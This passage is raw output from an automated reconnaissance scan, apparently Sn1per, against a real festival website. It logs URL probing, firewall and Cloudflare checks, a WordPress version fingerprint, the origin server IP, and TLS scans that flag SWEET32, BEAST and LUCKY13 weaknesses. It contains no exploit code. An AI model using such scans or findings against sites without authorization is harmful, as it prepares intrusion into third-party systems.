3258. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3259. |_[ + ] More details:: 
3260. |_[ + ] Found:: UNIDENTIFIED
3261. 
3262.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3263. |_[ + ] [ 14 / 23 ]-[14:23:12] [ - ] 
3264. |_[ + ] Target:: [ https://www.novalisfestival.com/?cat=6 ]
3265. |_[ + ] Exploit:: 
3266. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3267. |_[ + ] More details:: 
3268. |_[ + ] Found:: UNIDENTIFIED
3269. 
3270.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3271. |_[ + ] [ 15 / 23 ]-[14:23:13] [ - ] 
3272. |_[ + ] Target:: [ https://www.novalisfestival.com/?page_id=129 ]
3273. |_[ + ] Exploit:: 
3274. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3275. |_[ + ] More details:: 
3276. |_[ + ] Found:: UNIDENTIFIED
3277. 
3278.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3279. |_[ + ] [ 16 / 23 ]-[14:23:14] [ - ] 
3280. |_[ + ] Target:: [ https://www.novalisfestival.com/?page_id=42 ]
3281. |_[ + ] Exploit:: 
3282. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3283. |_[ + ] More details:: 
3284. |_[ + ] Found:: UNIDENTIFIED
3285. 
3286.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3287. |_[ + ] [ 17 / 23 ]-[14:23:15] [ - ] 
3288. |_[ + ] Target:: [ https://www.novalisfestival.com/?page_id=33 ]
3289. |_[ + ] Exploit:: 
3290. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3291. |_[ + ] More details:: 
3292. |_[ + ] Found:: UNIDENTIFIED
3293. 
3294.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3295. |_[ + ] [ 18 / 23 ]-[14:23:16] [ - ] 
3296. |_[ + ] Target:: [ https://www.novalisfestival.com/?page_id=37 ]
3297. |_[ + ] Exploit:: 
3298. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3299. |_[ + ] More details:: 
3300. |_[ + ] Found:: UNIDENTIFIED
3301. 
3302.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3303. |_[ + ] [ 19 / 23 ]-[14:23:17] [ - ] 
3304. |_[ + ] Target:: [ https://www.novalisfestival.com/?page_id=28 ]
3305. |_[ + ] Exploit:: 
3306. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3307. |_[ + ] More details:: 
3308. |_[ + ] Found:: UNIDENTIFIED
3309. 
3310.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3311. |_[ + ] [ 20 / 23 ]-[14:23:18] [ - ] 
3312. |_[ + ] Target:: [ https://www.novalisfestival.com/?page_id=40 ]
3313. |_[ + ] Exploit:: 
3314. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3315. |_[ + ] More details:: 
3316. |_[ + ] Found:: UNIDENTIFIED
3317. 
3318.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3319. |_[ + ] [ 21 / 23 ]-[14:23:19] [ - ] 
3320. |_[ + ] Target:: [ https://www.novalisfestival.com/wp-content/uploads/2017/11/Program_Novalis_2017.pdf ]
3321. |_[ + ] Exploit:: 
3322. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3323. |_[ + ] More details:: 
3324. |_[ + ] Found:: UNIDENTIFIED
3325. 
3326.  _[ - ]::--------------------------------------------------------------------------------------------------------------
3327. |_[ + ] [ 22 / 23 ]-[14:23:20] [ - ] 
3328. |_[ + ] Target:: [ https://www.novalisfestival.com/wp-content/uploads/2017/01/Program_Novalis_2016.pdf ]
3329. |_[ + ] Exploit:: 
3330. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:11c:443 
3331. |_[ + ] More details:: 
3332. |_[ + ] Found:: UNIDENTIFIED
3333.  
3334. [ INFO ] [ Shutting down ]
3335. [ INFO ] [ End of process INURLBR at [05-01-2018 14:23:20]
3336. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
3337. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-novalisfestival.com.txt ]
3338. |_________________________________________________________________________________________
3339.  
3340. \_________________________________________________________________________________________/
3341.  
3342.  + -- --=[Port 110 closed... skipping.
3343.  + -- --=[Port 111 closed... skipping.
3344.  + -- --=[Port 135 closed... skipping.
3345.  + -- --=[Port 139 closed... skipping.
3346.  + -- --=[Port 161 closed... skipping.
3347.  + -- --=[Port 162 closed... skipping.
3348.  + -- --=[Port 389 closed... skipping.
3349.  + -- --=[Port 443 opened... running tests...
3350.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
3351.  
3352. ^ ^
3353. _ __ _ ____ _ __ _ _ ____
3354. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
3355. | V V // o // _/ | V V // 0 // 0 // _/
3356. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
3357. <
3358. ...'
3359.  
3360. WAFW00F - Web Application Firewall Detection Tool
3361.  
3362. By Sandro Gauci && Wendel G. Henrique
3363.  
3364. Checking https://novalisfestival.com
3365. Generic Detection results:
3366. No WAF detected by the generic detection
3367. Number of requests: 13
3368.  
3369.  + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
3370. ____ _ _ _____ _ _
3371. / ___| | ___ _ _ __| | ___|_ _(_) |
3372. | | | |/ _ \| | | |/ _` | |_ / _` | | |
3373. | |___| | (_) | |_| | (_| | _| (_| | | |
3374. \____|_|\___/ \__,_|\__,_|_| \__,_|_|_|
3375. v1.0.1 by m0rtem
3376.  
3377.  
3378. [14:23:28] Initializing CloudFail - the date is: 05/01/2018
3379. [14:23:28] Fetching initial information from: novalisfestival.com...
3380. [14:23:28] No ipout file found, fetching data
3381. [14:23:28] Just checking for updates, please wait...
3382. [14:23:28] Updating CloudFlare subnet...
3383. [14:23:28] Updating Crimeflare database...
3384. [14:24:56] ipout file created
3385. [14:24:56] Server IP: 185.119.174.103
3386. [14:24:56] Testing if novalisfestival.com is on the Cloudflare network...
3387. [14:24:56] novalisfestival.com is not part of the Cloudflare network, quitting...
3388.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
3389. https://novalisfestival.com [301 Moved Permanently] HTTPServer[nginx], IP[185.119.174.103], RedirectLocation[http://www.novalisfestival.com/], Title[301 Moved Permanently], nginx
3390. http://www.novalisfestival.com/ [301 Moved Permanently] HTTPServer[nginx], IP[185.119.174.103], RedirectLocation[https://www.novalisfestival.com/], Title[301 Moved Permanently], nginx
3391. https://www.novalisfestival.com/ [200 OK] Email[info@novalisfestival.com], HTML5, HTTPServer[nginx], IP[185.119.174.103], JQuery[1.12.4], Lightbox, MetaGenerator[WordPress 4.9.1], PoweredBy[WordPress], Script[text/javascript], Title[NOVALIS MUSIC + art festival &#8211; 07.07. &#8211; 14.07.2018], UncommonHeaders[link], WordPress[4.9.1], nginx
3392.  
3393.  + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
3394.  
3395.  
3396.  
3397. AVAILABLE PLUGINS
3398. -----------------
3399.  
3400. PluginHSTS
3401. PluginHeartbleed
3402. PluginSessionRenegotiation
3403. PluginChromeSha1Deprecation
3404. PluginCompression
3405. PluginSessionResumption
3406. PluginCertInfo
3407. PluginOpenSSLCipherSuites
3408.  
3409.  
3410.  
3411. CHECKING HOST(S) AVAILABILITY
3412. -----------------------------
3413.  
3414. novalisfestival.com:443 => 2a01:9cc0:0:1:1a:3:0:11c:443
3415.  
3416.  
3417.  
3418. SCAN RESULTS FOR NOVALISFESTIVAL.COM:443 - 2A01:9CC0:0:1:1A:3:0:11C:443
3419. -----------------------------------------------------------------------
3420.  
3421. * Deflate Compression:
3422. OK - Compression disabled
3423.  
3424. * Session Renegotiation:
3425. Client-initiated Renegotiations: OK - Rejected
3426. Secure Renegotiation: OK - Supported
3427.  
3428. * Certificate - Content:
3429. SHA1 Fingerprint: 139a811cd4e10a2cdf809f40994ddebbe4da53f9
3430. Common Name: novalisfestival.com
3431. Issuer: Let's Encrypt Authority X3
3432. Serial Number: 03D9F8474A6A62FF13E8B4C16DE207DBA0F0
3433. Not Before: Oct 8 08:51:32 2017 GMT
3434. Not After: Jan 6 08:51:32 2018 GMT
3435. Signature Algorithm: sha256WithRSAEncryption
3436. Public Key Algorithm: rsaEncryption
3437. Key Size: 4096 bit
3438. Exponent: 65537 (0x10001)
3439. X509v3 Subject Alternative Name: {'DNS': ['novalisfestival.com', 'www.novalisfestival.com']}
3440.  
3441. * Certificate - Trust:
3442. Hostname Validation: OK - Subject Alternative Name matches
3443. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
3444. Java 6 CA Store (Update 65): OK - Certificate is trusted
3445. Microsoft CA Store (09/2015): OK - Certificate is trusted
3446. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
3447. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
3448. Certificate Chain Received: ['novalisfestival.com', "Let's Encrypt Authority X3"]
3449.  
3450. * Certificate - OCSP Stapling:
3451. NOT SUPPORTED - Server did not send back an OCSP response.
3452.  
3453. * Session Resumption:
3454. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
3455. With TLS Session Tickets: OK - Supported
3456.  
3457. * SSLV2 Cipher Suites:
3458. Server rejected all cipher suites.
3459.  
3460. * SSLV3 Cipher Suites:
3461. Server rejected all cipher suites.
3462.  
3463.  
3464.  
3465. SCAN COMPLETED IN 1.95 S
3466. ------------------------
3467. Version: 1.11.10-static
3468. OpenSSL 1.0.2-chacha (1.0.2g-dev)
3469. 
3470. Testing SSL server novalisfestival.com on port 443 using SNI name novalisfestival.com
3471.  
3472. TLS Fallback SCSV:
3473. Server supports TLS Fallback SCSV
3474.  
3475. TLS renegotiation:
3476. Secure session renegotiation supported
3477.  
3478. TLS Compression:
3479. Compression disabled
3480.  
3481. Heartbleed:
3482. TLS 1.2 not vulnerable to heartbleed
3483. TLS 1.1 not vulnerable to heartbleed
3484. TLS 1.0 not vulnerable to heartbleed
3485.  
3486. Supported Server Cipher(s):
3487. Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256  Curve P-256 DHE 256
3488. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384  Curve P-256 DHE 256
3489. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256  DHE 2048 bits
3490. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384  DHE 2048 bits
3491. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
3492. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
3493. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
3494. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
3495. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
3496. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
3497. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
3498. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
3499. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
3500. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
3501. Accepted TLSv1.2 128 bits AES128-SHA256
3502. Accepted TLSv1.2 256 bits AES256-SHA256
3503. Accepted TLSv1.2 128 bits AES128-SHA
3504. Accepted TLSv1.2 256 bits AES256-SHA
3505. Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
3506. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
3507. Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
3508. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
3509. Accepted TLSv1.2 112 bits DES-CBC3-SHA 
3510. Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
3511. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
3512. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
3513. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
3514. Accepted TLSv1.1 128 bits AES128-SHA
3515. Accepted TLSv1.1 256 bits AES256-SHA
3516. Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
3517. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
3518. Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
3519. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
3520. Accepted TLSv1.1 112 bits DES-CBC3-SHA 
3521. Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
3522. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
3523. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
3524. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
3525. Accepted TLSv1.0 128 bits AES128-SHA
3526. Accepted TLSv1.0 256 bits AES256-SHA
3527. Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
3528. Accepted TLSv1.0 256 bits CAMELLIA256-SHA
3529. Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
3530. Accepted TLSv1.0 128 bits CAMELLIA128-SHA
3531. Accepted TLSv1.0 112 bits DES-CBC3-SHA 
3532.  
3533. SSL Certificate:
3534. Signature Algorithm: sha256WithRSAEncryption
3535. RSA Key Strength: 4096
3536.  
3537. Subject: novalisfestival.com
3538. Altnames: DNS:novalisfestival.com, DNS:www.novalisfestival.com
3539. Issuer: Let's Encrypt Authority X3
3540.  
3541. Not valid before: Oct 8 08:51:32 2017 GMT
3542. Not valid after: Jan 6 08:51:32 2018 GMT
3543. 
3544. ###########################################################
3545. testssl 2.9dev from https://testssl.sh/dev/
3546. 
3547. This program is free software. Distribution and
3548. modification under GPLv2 permitted.
3549. USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
3550.  
3551. Please file bugs @ https://testssl.sh/bugs/
3552. 
3553. ###########################################################
3554.  
3555. Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
3556. on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
3557. (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
3558.  
3559.  
3560.  Start 2018-01-05 14:25:31 -->> 185.119.174.103:443 (novalisfestival.com) <<--
3561.  
3562. further IP addresses: 2a01:9cc0:0:1:1a:3:0:11c
3563. rDNS (185.119.174.103): web564.webfaction.com.
3564. Service detected: HTTP
3565.  
3566.  
3567.  Testing protocols via sockets except SPDY+HTTP2 
3568.  
3569.  SSLv2 not offered (OK)
3570.  SSLv3 not offered (OK)
3571.  TLS 1 offered
3572.  TLS 1.1 offered
3573.  TLS 1.2 offered (OK)
3574.  TLS 1.3 not offered
3575.  SPDY/NPN http/1.1 (advertised)
3576.  HTTP2/ALPN http/1.1 (offered)
3577.  
3578.  Testing ~standard cipher categories 
3579.  
3580.  NULL ciphers (no encryption) not offered (OK)
3581.  Anonymous NULL Ciphers (no authentication) not offered (OK)
3582.  Export ciphers (w/o ADH+NULL) not offered (OK)
3583.  LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
3584.  Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
3585.  Triple DES Ciphers (Medium) offered
3586.  High encryption (AES+Camellia, no AEAD) offered (OK)
3587.  Strong encryption (AEAD ciphers) offered (OK)
3588.  
3589.  
3590.  Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 
3591.  
3592.  PFS is offered (OK) ECDHE-RSA-AES256-GCM-SHA384
3593. ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
3594. DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256
3595. DHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA
3596. ECDHE-RSA-AES128-GCM-SHA256
3597. ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA
3598. DHE-RSA-AES128-GCM-SHA256 DHE-RSA-AES128-SHA256
3599. DHE-RSA-AES128-SHA DHE-RSA-CAMELLIA128-SHA
3600.  Elliptic curves offered: secp256k1 prime256v1 secp384r1 secp521r1
3601.  
3602.  
3603.  Testing server preferences 
3604.  
3605.  Has server cipher order? yes (OK)
3606.  Negotiated protocol TLSv1.2
3607.  Negotiated cipher ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
3608.  Cipher order
3609. TLSv1: ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-SHA DHE-RSA-AES128-SHA
3610. DHE-RSA-AES256-SHA AES128-SHA AES256-SHA DHE-RSA-CAMELLIA256-SHA
3611. CAMELLIA256-SHA DHE-RSA-CAMELLIA128-SHA CAMELLIA128-SHA
3612. DES-CBC3-SHA
3613. TLSv1.1: ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-SHA DHE-RSA-AES128-SHA
3614. DHE-RSA-AES256-SHA AES128-SHA AES256-SHA DHE-RSA-CAMELLIA256-SHA
3615. CAMELLIA256-SHA DHE-RSA-CAMELLIA128-SHA CAMELLIA128-SHA
3616. DES-CBC3-SHA
3617. TLSv1.2: ECDHE-RSA-AES128-GCM-SHA256 ECDHE-RSA-AES256-GCM-SHA384
3618. DHE-RSA-AES128-GCM-SHA256 DHE-RSA-AES256-GCM-SHA384
3619. ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA
3620. ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
3621. DHE-RSA-AES128-SHA256 DHE-RSA-AES128-SHA DHE-RSA-AES256-SHA256
3622. DHE-RSA-AES256-SHA AES128-GCM-SHA256 AES256-GCM-SHA384
3623. AES128-SHA256 AES256-SHA256 AES128-SHA AES256-SHA
3624. DHE-RSA-CAMELLIA256-SHA CAMELLIA256-SHA DHE-RSA-CAMELLIA128-SHA
3625. CAMELLIA128-SHA DES-CBC3-SHA
3626.  
3627.  
3628.  Testing server defaults (Server Hello) 
3629.  
3630.  TLS extensions (standard) "server name/#0" "renegotiation info/#65281"
3631. "EC point formats/#11" "session ticket/#35"
3632. "heartbeat/#15" "next protocol/#13172"
3633. "application layer protocol negotiation/#16"
3634.  Session Ticket RFC 5077 hint 600 seconds, session tickets keys seems to be rotated < daily
3635.  SSL Session ID support yes
3636.  Session Resumption Tickets: yes, ID: yes
3637.  TLS clock skew Random values, no fingerprinting possible
3638.  Signature Algorithm SHA256 with RSA
3639.  Server key size RSA 4096 bits
3640.  Fingerprint / Serial SHA1 139A811CD4E10A2CDF809F40994DDEBBE4DA53F9 / 03D9F8474A6A62FF13E8B4C16DE207DBA0F0
3641. SHA256 0B34CDA89CEF7556FF393FDCF77430E944D510C9942277B1462104D125877F1A
3642.  Common Name (CN) novalisfestival.com (CN in response to request w/o SNI: *.webfaction.com)
3643.  subjectAltName (SAN) novalisfestival.com www.novalisfestival.com 
3644.  Issuer Let's Encrypt Authority X3 (Let's Encrypt from US)
3645.  Trust (hostname) Ok via SAN and CN (SNI mandatory)
3646.  Chain of trust Ok 
3647.  EV cert (experimental) no
3648.  Certificate Expiration expires < 15 days (0) ! (2017-10-08 04:51 --> 2018-01-06 03:51 -0500)
3649.  # of certificates provided 2
3650.  Certificate Revocation List --
3651.  OCSP URI http://ocsp.int-x3.letsencrypt.org
3652.  OCSP stapling not offered
3653.  OCSP must staple no
3654.  DNS CAA RR (experimental) not offered
3655.  Certificate Transparency no
3656.  
3657.  
3658.  Testing HTTP header response @ "/" 
3659.  
3660.  HTTP Status Code  301 Moved Permanently, redirecting to "http://www.novalisfestival.com/" -- Redirect to insecure URL (NOT ok)
3661.  HTTP clock skew 0 sec from localtime
3662.  Strict Transport Security --
3663.  Public Key Pinning --
3664.  Server banner nginx
3665.  Application banner --
3666.  Cookie(s) (none issued at "/") -- maybe better try target URL of 30x
3667.  Security headers --
3668.  Reverse Proxy banner --
3669.  
3670.  
3671.  Testing vulnerabilities 
3672.  
3673.  Heartbleed (CVE-2014-0160) not vulnerable (OK), timed out
3674.  CCS (CVE-2014-0224) not vulnerable (OK)
3675.  Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK)
3676.  ROBOT not vulnerable (OK)
3677.  Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
3678.  Secure Client-Initiated Renegotiation not vulnerable (OK)
3679.  CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
3680.  BREACH (CVE-2013-3587) no HTTP compression (OK)  - only supplied "/" tested
3681.  POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
3682.  TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
3683.  SWEET32 (CVE-2016-2183, CVE-2016-6329) VULNERABLE, uses 64 bit block ciphers
3684.  FREAK (CVE-2015-0204) not vulnerable (OK)
3685.  DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
3686. make sure you don't use this certificate elsewhere with SSLv2 enabled services
3687. https://censys.io/ipv4?q=0B34CDA89CEF7556FF393FDCF77430E944D510C9942277B1462104D125877F1A could help you to find out
3688.  LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no common primes detected
3689.  BEAST (CVE-2011-3389) TLS1: ECDHE-RSA-AES128-SHA
3690. ECDHE-RSA-AES256-SHA
3691. DHE-RSA-AES128-SHA
3692. DHE-RSA-AES256-SHA AES128-SHA
3693. AES256-SHA
3694. DHE-RSA-CAMELLIA256-SHA
3695. CAMELLIA256-SHA
3696. DHE-RSA-CAMELLIA128-SHA
3697. CAMELLIA128-SHA DES-CBC3-SHA 
3698. VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
3699.  LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
3700.  RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
3701.  
3702.  
3703.  Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength 
3704.  
3705. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
3706. -----------------------------------------------------------------------------------------------------------------------------
3707. xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
3708. xc028 ECDHE-RSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
3709. xc014 ECDHE-RSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
3710. x9f DHE-RSA-AES256-GCM-SHA384 DH 2048 AESGCM 256 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
3711. x6b DHE-RSA-AES256-SHA256 DH 2048 AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
3712. x39 DHE-RSA-AES256-SHA DH 2048 AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
3713. x88 DHE-RSA-CAMELLIA256-SHA DH 2048 Camellia 256 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
3714. x9d AES256-GCM-SHA384 RSA AESGCM 256 TLS_RSA_WITH_AES_256_GCM_SHA384
3715. x3d AES256-SHA256 RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA256
3716. x35 AES256-SHA RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA
3717. x84 CAMELLIA256-SHA RSA Camellia 256 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
3718. xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
3719. xc027 ECDHE-RSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
3720. xc013 ECDHE-RSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
3721. x9e DHE-RSA-AES128-GCM-SHA256 DH 2048 AESGCM 128 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
3722. x67 DHE-RSA-AES128-SHA256 DH 2048 AES 128 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
3723. x33 DHE-RSA-AES128-SHA DH 2048 AES 128 TLS_DHE_RSA_WITH_AES_128_CBC_SHA
3724. x45 DHE-RSA-CAMELLIA128-SHA DH 2048 Camellia 128 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
3725. x9c AES128-GCM-SHA256 RSA AESGCM 128 TLS_RSA_WITH_AES_128_GCM_SHA256
3726. x3c AES128-SHA256 RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA256
3727. x2f AES128-SHA RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA
3728. x41 CAMELLIA128-SHA RSA Camellia 128 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
3729. x0a DES-CBC3-SHA RSA 3DES 168 TLS_RSA_WITH_3DES_EDE_CBC_SHA
3730.  
3731.  
3732.  Running client simulations via sockets 
3733.  
3734. Android 2.3.7 TLSv1.0 DHE-RSA-AES128-SHA, 2048 bit DH
3735. Android 4.1.1 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
3736. Android 4.3 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
3737. Android 4.4.2 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
3738. Android 5.0.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
3739. Android 6.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
3740. Android 7.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
3741. Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
3742. Chrome 57 Win 7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
3743. Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
3744. Firefox 53 Win 7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
3745. IE 6 XP No connection
3746. IE 7 Vista TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
3747. IE 8 XP TLSv1.0 DES-CBC3-SHA
3748. IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
3749. IE 11 Win 7 TLSv1.2 DHE-RSA-AES128-GCM-SHA256, 2048 bit DH
3750. IE 11 Win 8.1 TLSv1.2 DHE-RSA-AES128-GCM-SHA256, 2048 bit DH
3751. IE 11 Win Phone 8.1 Update TLSv1.2 DHE-RSA-AES128-GCM-SHA256, 2048 bit DH
3752. IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
3753. Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
3754. Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
3755. Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
3756. Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
3757. Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
3758. Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
3759. Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
3760. Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
3761. Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
3762. Java 6u45 No connection
3763. Java 7u25 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
3764. Java 8u31 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
3765. OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
